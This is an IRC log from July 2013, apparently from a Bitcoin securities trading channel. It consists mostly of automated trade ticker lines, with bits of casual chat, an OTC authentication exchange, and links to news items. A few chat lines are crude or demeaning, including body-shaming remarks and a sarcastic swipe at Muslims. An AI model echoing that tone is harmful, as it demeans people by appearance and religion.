[COGNITIVE] 4 @ 0.7772 = 3.1088 BTC [-] Jul 21 07:01:42 [BTCTC] [COGNITIVE] 4 @ 0.776005 = 3.104 BTC [-] Jul 21 07:01:43 [BTCTC] [COGNITIVE] 1 @ 0.762002 BTC [-] Jul 21 07:01:45 [BTCTC] [COGNITIVE] 1 @ 0.762002 BTC [-] Jul 21 07:01:46 [BTCTC] [COGNITIVE] 3 @ 0.762001 = 2.286 BTC [-] Jul 21 07:01:47 [BTCTC] [AMC-PT] 155 @ 0.00267 = 0.4139 BTC [+] Jul 21 07:01:49 [BTCTC] [COGNITIVE] 1 @ 0.76 BTC [-] Jul 21 07:01:50 [BTCTC] [COGNITIVE] 2 @ 0.750001 = 1.5 BTC [-] Jul 21 07:01:51 [BTCTC] [COGNITIVE] 3 @ 0.75 = 2.25 BTC [-] Jul 21 07:01:53 [BTCTC] [COGNITIVE] 1 @ 0.75 BTC [-] Jul 21 07:01:54 [BTCTC] [COGNITIVE] 1 @ 0.7225 BTC [-] Jul 21 07:01:56 [BTCTC] [COGNITIVE] 1 @ 0.689002 BTC [-] Jul 21 07:02:02 [BTCTC] [AMC-PT] 2 @ 0.00258 = 0.0052 BTC [-] Jul 21 07:02:04 [BTCTC] [AMC-PT] 100 @ 0.00255 = 0.255 BTC [-] Jul 21 07:02:08 [BTCTC] [AMC-PT] 40 @ 0.002521 = 0.1008 BTC [-] Jul 21 07:03:19 [BTCTC] [ASICMINER-PT] 1 @ 4.779899 BTC [-] Jul 21 07:03:21 [BTCTC] [ASICMINER-PT] 1 @ 4.7799 BTC [+] Jul 21 07:03:23 [BTCTC] [ASICMINER-PT] 1 @ 4.779988 BTC [+] Jul 21 07:03:24 [BTCTC] [ASICMINER-PT] 1 @ 4.779998 BTC [+] Jul 21 07:03:55 [HAVELOCK] [SMG] 1 @ 0.00028688 BTC [-] Jul 21 07:04:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.044999 = 2.25 BTC [-] Jul 21 07:04:31 [BTCTC] [TAT.ASICMINER] 49 @ 0.045 = 2.205 BTC [+] Jul 21 07:04:32 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003654 = 0.3654 BTC [-] Jul 21 07:09:06 amc is vmc is activemining Jul 21 07:09:09 all the same guy Jul 21 07:12:36 [BTCTC] [AMC-PT] 3 @ 0.00265 = 0.008 BTC [+] Jul 21 07:20:55 a ok Jul 21 07:22:11 ;;eauth mircea_popescu Jul 21 07:22:12 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Jul 21 07:22:42 ;;everify freenode:#bitcoin-otc:411eca6a80732bcb8e2aa6a5a499a30fbdb6f4044da5c3d4fd5e4776 Jul 21 07:22:43 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Jul 21 07:23:20 [BTCTC] [AMC-PT] 25 @ 0.002522 = 0.0631 BTC [-] Jul 21 07:23:29 don't do that here Jul 21 07:24:30 ;;buy 1 "ISK, PLEX" at 1 BTC Negotiable rates. Also looking for a well skilled industrialist. PM. Jul 21 07:24:31 Order id 16969 created. Jul 21 07:24:33 [BTCTC] [LTC-ATF.B2] 100 @ 0.01 = 1 BTC [+] Jul 21 07:24:39 ;;view 16969 Jul 21 07:24:40 #16969 Sun Jul 21 00:24:28 2013 mircea_popescu BUY 1.0 ISK, PLEX @ 1 BTC (Negotiable rates. Also looking for a well skilled industrialist. PM.) Jul 21 07:33:08 [BTCTC] [DMS.SELLING] 1 @ 0.024 BTC [-] Jul 21 07:35:29 [MPEX] [S.MPOE] 2400 @ 0.00087916 = 2.11 BTC [-] Jul 21 07:39:42 [BTCTC] [DMS.MINING] 2 @ 0.015202 = 0.0304 BTC [+] Jul 21 07:40:43 [BTCTC] [DMS.MINING] 10 @ 0.015202 = 0.152 BTC [+] Jul 21 07:41:11 [HAVELOCK] [AM100] 125 @ 0.042675 = 5.3344 BTC [-] Jul 21 07:41:16 [BTCTC] [DMS.SELLING] 6 @ 0.024 = 0.144 BTC [-] Jul 21 07:42:07 [HAVELOCK] [SDSTM] 53 @ 0.0119 = 0.6307 BTC [+] Jul 21 07:43:01 [HAVELOCK] [SDSTM] 46 @ 0.012 = 0.552 BTC [+] Jul 21 07:43:48 [HAVELOCK] [SMG] 9 @ 0.00027 = 0.0024 BTC [-] Jul 21 07:43:51 [HAVELOCK] [SMG] 91 @ 0.00027 = 0.0246 BTC [-] Jul 21 07:48:18 [MPEX] [S.MPOE] 3600 @ 0.00088295 = 3.1786 BTC [+] Jul 21 07:56:53 [HAVELOCK] [SMG] 1 @ 0.00028688 BTC [+] Jul 21 07:59:39 [BTCTC] [TAT.ASICMINER] 24 @ 0.045 = 1.08 BTC [+] Jul 21 08:03:31 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003644 = 0.1093 BTC [-] Jul 21 08:03:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003644 BTC [-] Jul 21 08:04:17 [BTCTC] [TAT.VIRTUALMINE] 92 @ 0.0036 = 0.3312 BTC [-] Jul 21 08:04:58 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.003548 = 0.071 BTC [-] Jul 21 08:05:53 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003547 = 0.3547 BTC [-] Jul 21 08:06:30 [BTCTC] [FIMB] 3 @ 0.0105 = 0.0315 BTC [-] Jul 21 08:06:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0035 BTC [-] Jul 21 08:06:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0035 BTC [-] Jul 21 08:06:42 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.0035 = 0.1575 BTC [-] Jul 21 08:06:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0035 = 0.035 BTC [-] Jul 21 08:07:23 [BTCTC] [TAT.VIRTUALMINE] 76 @ 0.0033 = 0.2508 BTC [-] Jul 21 08:10:58 [BTCTC] [RSM] 100 @ 0.018 = 1.8 BTC [+] Jul 21 08:11:23 [BTCTC] [BASIC-MINING] 4 @ 0.682 = 2.728 BTC [-] Jul 21 08:11:27 [HAVELOCK] [AM100] 87 @ 0.042675 = 3.7127 BTC [-] Jul 21 08:11:33 [BTCTC] [DMS.MINING] 10 @ 0.015202 = 0.152 BTC [+] Jul 21 08:13:21 [BTCTC] [DMS.MINING] 72 @ 0.015999 = 1.1519 BTC [+] Jul 21 08:18:45 [BTCTC] [B.YABMC] 60 @ 0.003088 = 0.1853 BTC [+] Jul 21 08:24:28 [BTCTC] [AMC-PT] 37 @ 0.00265 = 0.0981 BTC [+] Jul 21 08:29:19 [BTCTC] [TAT.ASICMINER] 90 @ 0.045 = 4.05 BTC [+] Jul 21 08:30:35 [BTCTC] [AMC-PT] 100 @ 0.002659 = 0.2659 BTC [+] Jul 21 08:33:40 [BTCTC] [AMC-PT] 100 @ 0.002659 = 0.2659 BTC [+] Jul 21 08:33:44 [HAVELOCK] [SDSTM] 50 @ 0.01199999 = 0.6 BTC [-] Jul 21 08:34:23 [BTCTC] [AMC-PT] 1000 @ 0.00266 = 2.66 BTC [+] Jul 21 08:34:24 [BTCTC] [ASICMINER-PT] 15 @ 4.73 = 70.95 BTC [-] Jul 21 08:34:26 [BTCTC] [ASICMINER-PT] 2 @ 4.73 = 9.46 BTC [-] Jul 21 08:35:21 [BTCTC] [AMC-PT] 2500 @ 0.00267 = 6.675 BTC [+] Jul 21 08:35:32 [BTCTC] [LTC-ATF.B2] 4 @ 0.009954 = 0.0398 BTC [-] Jul 21 08:37:31 [HAVELOCK] [AM100] 1 @ 0.043898 BTC [+] Jul 21 08:38:44 [HAVELOCK] [AM100] 2 @ 0.043898 = 0.0878 BTC [+] Jul 21 08:40:24 [HAVELOCK] [AM100] 75 @ 0.043898 = 3.2924 BTC [+] Jul 21 08:41:35 [HAVELOCK] [AM100] 5 @ 0.043898 = 0.2195 BTC [+] Jul 21 08:42:11 [HAVELOCK] [SMG] 1000 @ 0.0002701 = 0.2701 BTC [-] Jul 21 08:42:13 [HAVELOCK] [SMG] 109 @ 0.00027 = 0.0294 BTC [-] Jul 21 08:42:16 [HAVELOCK] [SMG] 2231 @ 0.000262 = 0.5845 BTC [-] Jul 21 08:42:18 [HAVELOCK] [SMG] 16 @ 0.00026111 = 0.0042 BTC [-] Jul 21 08:42:19 [HAVELOCK] [SMG] 1000 @ 0.0002611 = 0.2611 BTC [-] Jul 21 08:42:21 [HAVELOCK] [SMG] 25 @ 0.0002611 = 0.0065 BTC [-] Jul 21 08:42:23 [HAVELOCK] [SMG] 393 @ 0.00026105 = 0.1026 BTC [-] Jul 21 08:42:25 [HAVELOCK] [SMG] 500 @ 0.0002604 = 0.1302 BTC [-] Jul 21 08:42:27 [HAVELOCK] [SMG] 2360 @ 0.00026035 = 0.6144 BTC [-] Jul 21 08:42:29 [HAVELOCK] [SMG] 7366 @ 0.0002603 = 1.9174 BTC [-] Jul 21 08:42:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.045001 BTC [+] Jul 21 08:43:09 [BTCTC] [TAT.ASICMINER] 20 @ 0.045001 = 0.9 BTC [+] Jul 21 08:43:54 [HAVELOCK] [SMG] 929 @ 0.0002603 = 0.2418 BTC [-] Jul 21 08:43:57 [HAVELOCK] [SMG] 885 @ 0.0002602 = 0.2303 BTC [-] Jul 21 08:43:59 [HAVELOCK] [SMG] 1100 @ 0.0002601 = 0.2861 BTC [-] Jul 21 08:44:00 [HAVELOCK] [SMG] 14720 @ 0.00026 = 3.8272 BTC [-] Jul 21 08:44:02 [HAVELOCK] [SMG] 300 @ 0.00026 = 0.078 BTC [-] Jul 21 08:44:04 [HAVELOCK] [SMG] 1000 @ 0.0002501 = 0.2501 BTC [-] Jul 21 08:44:06 [HAVELOCK] [SMG] 1066 @ 0.00025 = 0.2665 BTC [-] Jul 21 08:44:30 [HAVELOCK] [SDSTM] 5 @ 0.012 = 0.06 BTC [+] Jul 21 08:45:01 [BTCTC] [DMS.PURCHASE] 2 @ 0.039514 = 0.079 BTC [+] Jul 21 08:47:28 [HAVELOCK] [AM100] 2 @ 0.043898 = 0.0878 BTC [+] Jul 21 08:50:25 [BTCTC] [ASICMINER-PT] 1 @ 4.77 BTC [+] Jul 21 08:52:15 [HAVELOCK] [AM100] 20 @ 0.043 = 0.86 BTC [-] Jul 21 09:02:53 [BTCTC] [LTC-ATF.B2] 200 @ 0.01 = 2 BTC [+] Jul 21 09:04:33 [MPEX] [S.MPOE] 9650 @ 0.00087916 = 8.4839 BTC [-] Jul 21 09:06:19 [BTCTC] [LTC-ATF.B2] 18 @ 0.009953 = 0.1792 BTC [-] Jul 21 09:09:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.045001 BTC [+] Jul 21 09:09:02 [BTCTC] [TAT.ASICMINER] 78 @ 0.045674 = 3.5626 BTC [+] Jul 21 09:09:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.045675 BTC [+] Jul 21 09:09:05 [BTCTC] [TAT.ASICMINER] 77 @ 0.045675 = 3.517 BTC [+] Jul 21 09:10:43 [BTCTC] [LTC-ATF.B2] 2 @ 0.009953 = 0.0199 BTC [-] Jul 21 09:11:15 [BTCTC] [COGNITIVE] 1 @ 0.72 BTC [+] Jul 21 09:11:24 [MPEX] [S.MPOE] 172 @ 0.00087916 = 0.1512 BTC [-] Jul 21 09:11:26 [MPEX] [S.MPOE] 4828 @ 0.00087779 = 4.238 BTC [-] Jul 21 09:25:45 [HAVELOCK] [AM100] 87 @ 0.043899 = 3.8192 BTC [+] Jul 21 09:32:23 [BTCTC] [DMS.MINING] 7 @ 0.015998 = 0.112 BTC [-] Jul 21 09:32:30 Anyone seen Pirate recently? Or TradeFortress? Jul 21 09:41:31 [MPEX] [S.MPOE] 1778 @ 0.00088283 = 1.5697 BTC [+] Jul 21 09:41:32 [MPEX] [S.MPOE] 1000 @ 0.00088295 = 0.883 BTC [+] Jul 21 09:41:46 [MPEX] [S.MPOE] 3976 @ 0.00088334 = 3.5122 BTC [+] Jul 21 09:41:48 [MPEX] [S.MPOE] 1003 @ 0.00088347 = 0.8861 BTC [+] Jul 21 09:59:13 [MPEX] [S.MG] 600 @ 0.00026901 = 0.1614 BTC [+] Jul 21 10:00:12 [HAVELOCK] [AM100] 26 @ 0.043899 = 1.1414 BTC [+] Jul 21 10:01:43 [MPEX] [S.MPOE] 9900 @ 0.00088347 = 8.7464 BTC [+] Jul 21 10:01:45 [MPEX] [S.MPOE] 1300 @ 0.00088355 = 1.1486 BTC [+] Jul 21 10:01:58 [MPEX] [S.MPOE] 2486 @ 0.00088365 = 2.1968 BTC [+] Jul 21 10:13:30 [BTCTC] [ASICMINER-PT] 1 @ 4.769999 BTC [-] Jul 21 10:16:41 [BTCTC] [ASICMINER-PT] 1 @ 4.771999 BTC [+] Jul 21 10:20:32 [BTCTC] [ASICMINER-PT] 3 @ 4.771999 = 14.316 BTC [+] Jul 21 10:22:18 [BTCTC] [TAT.ASICMINER] 8 @ 0.045674 = 0.3654 BTC [-] Jul 21 10:22:45 [HAVELOCK] [AM100] 2 @ 0.043899 = 0.0878 BTC [+] Jul 21 10:22:48 [BTCTC] [AMC-PT] 100 @ 0.002558 = 0.2558 BTC [-] Jul 21 10:22:49 [BTCTC] [AMC-PT] 600 @ 0.002556 = 1.5336 BTC [-] Jul 21 10:22:51 [BTCTC] [AMC-PT] 85 @ 0.002555 = 0.2172 BTC [-] Jul 21 10:22:52 [BTCTC] [AMC-PT] 100 @ 0.002532 = 0.2532 BTC [-] Jul 21 10:22:54 [BTCTC] [AMC-PT] 200 @ 0.002523 = 0.5046 BTC [-] Jul 21 10:22:55 [BTCTC] [AMC-PT] 915 @ 0.002522 = 2.3076 BTC [-] Jul 21 10:33:39 [MPEX] [S.MPOE] 1122 @ 0.00087779 = 0.9849 BTC [-] Jul 21 10:33:40 [MPEX] [S.MPOE] 3450 @ 0.00087757 = 3.0276 BTC [-] Jul 21 10:33:53 [MPEX] [S.MPOE] 1650 @ 0.00087617 = 1.4457 BTC [-] Jul 21 10:35:23 [BTCTC] [AMC-PT] 60 @ 0.002522 = 0.1513 BTC [-] Jul 21 10:35:25 [BTCTC] [AMC-PT] 353 @ 0.002522 = 0.8903 BTC [-] Jul 21 10:45:31 [BTCTC] [BFMINES] 10 @ 0.003699 = 0.037 BTC [-] Jul 21 10:45:33 [BTCTC] [BFMINES] 30 @ 0.003256 = 0.0977 BTC [-] Jul 21 10:45:50 [BTCTC] [LTC-ATF.B2] 2 @ 0.01 = 0.02 BTC [+] Jul 21 10:46:21 [BTCTC] [COGNITIVE] 1 @ 0.834976 BTC [+] Jul 21 10:46:23 [BTCTC] [COGNITIVE] 1 @ 0.834977 BTC [+] Jul 21 10:46:24 [BTCTC] [COGNITIVE] 1 @ 0.835 BTC [+] Jul 21 10:46:26 [BTCTC] [COGNITIVE] 2 @ 0.839899 = 1.6798 BTC [+] Jul 21 10:49:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.045673 = 0.1827 BTC [-] Jul 21 10:49:52 [BTCTC] [BASIC-MINING] 9 @ 0.69 = 6.21 BTC [+] Jul 21 10:52:25 [BTCTC] [BASIC-MINING] 5 @ 0.7 = 3.5 BTC [+] Jul 21 11:03:19 [BTCTC] [TAT.ASICMINER] 18 @ 0.045672 = 0.8221 BTC [-] Jul 21 11:05:46 [BTCTC] [TAT.ASICMINER] 53 @ 0.045673 = 2.4207 BTC [+] Jul 21 11:06:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.045675 = 0.3654 BTC [+] Jul 21 11:07:43 [BTCTC] [TAT.ASICMINER] 44 @ 0.045673 = 2.0096 BTC [-] Jul 21 11:07:58 [HAVELOCK] [AM100] 44 @ 0.043899 = 1.9316 BTC [+] Jul 21 11:24:13 [BTCTC] [TAT.ASICMINER] 50 @ 0.045013 = 2.2507 BTC [-] Jul 21 11:32:04 [MPEX] [S.MPOE] 3300 @ 0.00081425 = 2.687 BTC [-] Jul 21 11:41:51 [MPEX] [S.MPOE] 4950 @ 0.00081629 = 4.0406 BTC [+] Jul 21 11:41:53 [MPEX] [S.MPOE] 1037 @ 0.00082156 = 0.852 BTC [+] Jul 21 11:42:03 [MPEX] [S.MPOE] 2800 @ 0.00082285 = 2.304 BTC [+] Jul 21 11:42:07 [MPEX] [S.MPOE] 1213 @ 0.00082829 = 1.0047 BTC [+] Jul 21 11:42:40 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 21 11:43:25 [MPEX] [S.MPOE] 1187 @ 0.00082829 = 0.9832 BTC [+] Jul 21 11:47:08 [BTCTC] [TAT.ASICMINER] 6 @ 0.045674 = 0.274 BTC [+] Jul 21 11:47:16 [BTCTC] [TAT.VIRTUALMINE] 89 @ 0.003408 = 0.3033 BTC [+] Jul 21 11:55:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.045672 BTC [-] Jul 21 11:57:34 [HAVELOCK] [SMG] 12 @ 0.000265 = 0.0032 BTC [+] Jul 21 11:57:46 [MPEX] [S.MPOE] 3813 @ 0.00082829 = 3.1583 BTC [+] Jul 21 11:59:50 eh Jul 21 11:59:59 [BTCTC] [ASICMINER-PT] 1 @ 4.69001 BTC [-] Jul 21 12:00:01 [BTCTC] [ASICMINER-PT] 4 @ 4.685101 = 18.7404 BTC [-] Jul 21 12:00:03 [BTCTC] [ASICMINER-PT] 2 @ 4.6851 = 9.3702 BTC [-] Jul 21 12:00:45 [MPEX] [S.MPOE] 3887 @ 0.00082594 = 3.2104 BTC [-] Jul 21 12:05:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.045672 = 0.0913 BTC [-] Jul 21 12:08:10 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [+] Jul 21 12:12:17 [BTCTC] [DMS.MINING] 1 @ 0.015996 BTC [-] Jul 21 12:12:34 [HAVELOCK] [HIM] 7 @ 0.268 = 1.876 BTC [+] Jul 21 12:13:28 [HAVELOCK] [HIM] 1 @ 0.295 BTC [+] Jul 21 12:13:30 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003549 = 0.0071 BTC [+] Jul 21 12:15:14 [BTCTC] [BFMINES] 30 @ 0.003999 = 0.12 BTC [+] Jul 21 12:15:53 [BTCTC] [BFMINES] 20 @ 0.004 = 0.08 BTC [+] Jul 21 12:17:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003549 BTC [+] Jul 21 12:30:55 [MPEX] [S.MPOE] 7650 @ 0.00083022 = 6.3512 BTC [+] Jul 21 12:31:47 " At colleges nationally, by senior year, 4 in 10 students are either virgins or have had intercourse with only one person, according to the Online College Social Life Survey. " Jul 21 12:31:51 dude. ahahahaah Jul 21 12:35:29 uh, kaaaaaaaay Jul 21 12:38:43 Mercedes, a junior at Penn who is on financial aid, said that at her mostly Latino public high school in California, it was the troubled and unmotivated students who drank and hooked up, while the honors students who wanted to go to college kept away from those things. Jul 21 12:38:43 When she went to Penn, she was surprised to see her elite classmates drinking, but even more surprised by the casual making out. She would go along with her friends to fraternity parties, but she refused to dance with strangers or to kiss anyone. Jul 21 12:38:48 sounds legit. Jul 21 12:41:24 [BTCTC] [ASICMINER-PT] 1 @ 4.744999 BTC [+] Jul 21 12:43:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.045673 BTC [+] Jul 21 12:46:27 mercedes sounds like a fat girl name Jul 21 12:46:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.045673 = 0.0913 BTC [+] Jul 21 12:47:46 [BTCTC] [ASICMINER-PT] 1 @ 4.693001 BTC [-] Jul 21 12:48:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003549 BTC [+] Jul 21 12:50:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.045006 = 0.36 BTC [-] Jul 21 12:56:48 all the mercedii i knew were skinny Jul 21 13:00:50 too small a sample Jul 21 13:02:14 >mercedii Jul 21 13:02:24 -_-` Jul 21 13:11:23 Scrat ya just a couple Jul 21 13:11:41 Diablo-D3 it's how it goes now no ? winklevii, dickledii... Jul 21 13:11:58 the troubled, unmotivated students drink, hook-up, smoke pot..honors students who want to go to college keep away from those things and stick to cocaine, prescription drugs and gamble. Jul 21 13:12:10 "eat a bag of penii" Jul 21 13:12:30 i think we may have somethingii here Jul 21 13:12:47 [BTCTC] [AMC-PT] 400 @ 0.00254 = 1.016 BTC [+] Jul 21 13:12:49 [BTCTC] [AMC-PT] 4 @ 0.002523 = 0.0101 BTC [-] Jul 21 13:12:51 [BTCTC] [AMC-PT] 78 @ 0.002522 = 0.1967 BTC [-] Jul 21 13:12:52 [BTCTC] [AMC-PT] 75 @ 0.002522 = 0.1892 BTC [-] Jul 21 13:12:54 [BTCTC] [AMC-PT] 16 @ 0.002516 = 0.0403 BTC [-] Jul 21 13:12:55 [BTCTC] [AMC-PT] 4000 @ 0.002515 = 10.06 BTC [-] Jul 21 13:12:57 [BTCTC] [AMC-PT] 5000 @ 0.002511 = 12.555 BTC [-] Jul 21 13:12:58 [BTCTC] [AMC-PT] 3000 @ 0.002511 = 7.533 BTC [-] Jul 21 13:13:03 anii is legit though Jul 21 13:13:21 anals ? Jul 21 13:13:39 [HAVELOCK] [SMG] 12 @ 0.000265 = 0.0032 BTC [+] Jul 21 13:13:43 anuses Jul 21 13:14:11 assholes everywhere Jul 21 13:14:24 girlii anii well fuckii Jul 21 13:14:43 basically let's move back to romanian Jul 21 13:14:54 (anii = the years, most plurals form by adding i) Jul 21 13:14:58 [BTCTC] [AMC-PT] 1565 @ 0.00251 = 3.9282 BTC [-] Jul 21 13:15:22 romanian vampirii Jul 21 13:15:42 as in multiple vampur Jul 21 13:16:30 somebody contact the folks at world of tanks and ax them to accept btc im tired of using my cc Jul 21 13:16:38 vampir, vampire. vampiri, vampires. Jul 21 13:16:43 vampirii the vampires Jul 21 13:16:45 o.. Jul 21 13:17:05 [BTCTC] [ASICMINER-PT] 2 @ 4.701 = 9.402 BTC [+] Jul 21 13:17:08 [BTCTC] [ASICMINER-PT] 1 @ 4.700001 BTC [-] Jul 21 13:19:58 [BTCTC] [AMC-PT] 1175 @ 0.002599 = 3.0538 BTC [+] Jul 21 13:24:07 http://www.omgubuntu.co.uk/2013/07/ubuntu-forum-hacked-users-advised-to-change-passwords Jul 21 13:24:11 Ubuntu Forums Hacked, 1.8 Million Passwords, E-Mails & Usernames Stolen | OMG Ubuntu! Jul 21 13:24:20 http://www.cbc.ca/news/world/story/2013/07/20/norwegian-rape-dubai.html Jul 21 13:24:25 Norwegian raped in Dubai gets jail sentence - World - CBC News Jul 21 13:24:54 [HAVELOCK] [SMG] 976 @ 0.000265 = 0.2586 BTC [+] Jul 21 13:25:32 true muslim justice Jul 21 13:40:59 "Why is HYIP so much popular? Jul 21 13:40:59 HYIP are various very profitable income projects." Jul 21 13:41:11 totally. the projects. Jul 21 13:52:41 [BTCTC] [AMC-PT] 100 @ 0.002599 = 0.2599 BTC [+] Jul 21 13:52:43 [BTCTC] [AMC-PT] 5000 @ 0.0026 = 13 BTC [+] Jul 21 13:52:45 [BTCTC] [AMC-PT] 5000 @ 0.002648 = 13.24 BTC [+] Jul 21 13:55:54 [BTCTC] [AMC-PT] 500 @ 0.002649 = 1.3245 BTC [+] Jul 21 13:55:56 [BTCTC] [AMC-PT] 32 @ 0.002649 = 0.0848 BTC [+] Jul 21 13:57:38 [BTCTC] [DMS.MINING] 1 @ 0.0155 BTC [-] Jul 21 13:57:40 [BTCTC] [DMS.MINING] 17 @ 0.015202 = 0.2584 BTC [-] Jul 21 13:59:03 [HAVELOCK] [SDSTM] 2 @ 0.012 = 0.024 BTC [+] Jul 21 14:00:33 [MPEX] [S.MPOE] 4100 @ 0.00083295 = 3.4151 BTC [+] Jul 21 14:02:31 [HAVELOCK] [AM1] 2 @ 4.65 = 9.3 BTC [+] Jul 21 14:02:53 [HAVELOCK] [AM1] 1 @ 4.65 BTC [+] Jul 21 14:04:46 [HAVELOCK] [AM1] 3 @ 4.65 = 13.95 BTC [+] Jul 21 14:17:49 [MPEX] [S.MPOE] 6000 @ 0.00083295 = 4.9977 BTC [+] Jul 21 14:17:51 [MPEX] [S.MPOE] 50 @ 0.00083741 = 0.0419 BTC [+] Jul 21 14:19:04 [BTCTC] [AMC-PT] 37 @ 0.002649 = 0.098 BTC [+] Jul 21 14:20:26 [BTCTC] [DMS.MINING] 7 @ 0.015202 = 0.1064 BTC [-] Jul 21 14:21:46 btctttvc is broken Jul 21 14:32:52 [BTCTC] [S.MPOE-PT] 1 @ 0.000831 BTC [-] Jul 21 14:33:20 [BTCTC] [S.MPOE-PT] 1 @ 0.000831 BTC [-] Jul 21 14:33:47 [BTCTC] [AMC-PT] 1 @ 0.002649 BTC [+] Jul 21 14:33:57 [MPEX] [S.MPOE] 3212 @ 0.00083246 = 2.6739 BTC [-] Jul 21 14:34:13 [HAVELOCK] [AM100] 100 @ 0.042678 = 4.2678 BTC [-] Jul 21 14:52:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.045539 = 0.0911 BTC [+] Jul 21 14:53:40 [MPEX] [S.MPOE] 10700 @ 0.00083741 = 8.9603 BTC [+] Jul 21 15:01:54 [HAVELOCK] [SMG] 1024 @ 0.000268 = 0.2744 BTC [+] Jul 21 15:02:04 [HAVELOCK] [VTX] 1 @ 0.56 BTC [+] Jul 21 15:06:49 [BTCTC] [BITVPS] 10 @ 0.002 = 0.02 BTC [-] Jul 21 15:11:41 [BTCTC] [DMS.MINING] 4 @ 0.015202 = 0.0608 BTC [-] Jul 21 15:27:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.04553 = 0.1821 BTC [-] Jul 21 15:28:57 [BTCTC] [DMS.PURCHASE] 1 @ 0.039514 BTC [+] Jul 21 15:33:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.045529 = 0.2732 BTC [-] Jul 21 15:37:23 [BTCTC] [COGNITIVE] 1 @ 0.839837 BTC [-] Jul 21 15:37:37 [BTCTC] [COGNITIVE] 3 @ 0.839849 = 2.5195 BTC [+] Jul 21 15:37:56 [BTCTC] [COGNITIVE] 4 @ 0.83986 = 3.3594 BTC [+] Jul 21 15:38:59 [BTCTC] [AMC-PT] 25 @ 0.002647 = 0.0662 BTC [-] Jul 21 15:39:01 [BTCTC] [AMC-PT] 500 @ 0.002647 = 1.3235 BTC [-] Jul 21 15:42:32 [BTCTC] [AMC-PT] 430 @ 0.002649 = 1.1391 BTC [+] Jul 21 15:42:34 [BTCTC] [AMC-PT] 100 @ 0.002649 = 0.2649 BTC [+] Jul 21 15:42:35 [BTCTC] [AMC-PT] 460 @ 0.00266 = 1.2236 BTC [+] Jul 21 15:42:37 [BTCTC] [AMC-PT] 1000 @ 0.002664 = 2.664 BTC [+] Jul 21 15:42:38 [BTCTC] [AMC-PT] 40 @ 0.00267 = 0.1068 BTC [+] Jul 21 15:42:39 [BTCTC] [AMC-PT] 2 @ 0.002675 = 0.0054 BTC [+] Jul 21 15:42:40 [BTCTC] [AMC-PT] 1175 @ 0.002686 = 3.1561 BTC [+] Jul 21 15:42:41 [BTCTC] [AMC-PT] 1000 @ 0.002686 = 2.686 BTC [+] Jul 21 15:42:42 [BTCTC] [AMC-PT] 920 @ 0.002687 = 2.472 BTC [+] Jul 21 15:42:43 [BTCTC] [AMC-PT] 1000 @ 0.002688 = 2.688 BTC [+] Jul 21 15:42:45 [BTCTC] [AMC-PT] 2117 @ 0.002689 = 5.6926 BTC [+] Jul 21 15:46:17 [BTCTC] [ASICMINER-PT] 1 @ 4.740999 BTC [+] Jul 21 15:47:24 [BTCTC] [AMC-PT] 300 @ 0.002712 = 0.8136 BTC [+] Jul 21 15:47:26 [BTCTC] [AMC-PT] 35 @ 0.002712 = 0.0949 BTC [+] Jul 21 15:48:56 [HAVELOCK] [AM100] 1 @ 0.0432 BTC [+] Jul 21 15:49:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.04555 = 0.0911 BTC [+] Jul 21 15:54:13 [HAVELOCK] [AM100] 95 @ 0.042911 = 4.0765 BTC [-] Jul 21 16:08:39 [HAVELOCK] [SMG] 880 @ 0.0002699 = 0.2375 BTC [+] Jul 21 16:08:42 [HAVELOCK] [SMG] 1000 @ 0.00027 = 0.27 BTC [+] Jul 21 16:08:44 [HAVELOCK] [SMG] 16 @ 0.00027999 = 0.0045 BTC [+] Jul 21 16:08:46 [HAVELOCK] [SMG] 1000 @ 0.00028 = 0.28 BTC [+] Jul 21 16:08:48 [HAVELOCK] [SMG] 200 @ 0.00028 = 0.056 BTC [+] Jul 21 16:08:50 [HAVELOCK] [SMG] 484 @ 0.00028688 = 0.1388 BTC [+] Jul 21 16:08:53 [HAVELOCK] [SMG] 1420 @ 0.00028779 = 0.4087 BTC [+] Jul 21 16:22:53 [HAVELOCK] [SMG] 185 @ 0.00028768 = 0.0532 BTC [-] Jul 21 16:23:43 [HAVELOCK] [SMG] 4 @ 0.00028768 = 0.0012 BTC [-] Jul 21 16:24:33 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003555 = 0.0889 BTC [+] Jul 21 16:25:22 [HAVELOCK] [SMG] 19 @ 0.00028768 = 0.0055 BTC [-] Jul 21 16:28:18 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003555 = 0.0889 BTC [+] Jul 21 16:28:55 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003555 = 0.0889 BTC [+] Jul 21 16:33:26 [BTCTC] [ASICMINER-PT] 1 @ 4.739999 BTC [-] Jul 21 16:33:40 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003601 = 0.09 BTC [+] Jul 21 16:34:28 [BTCTC] 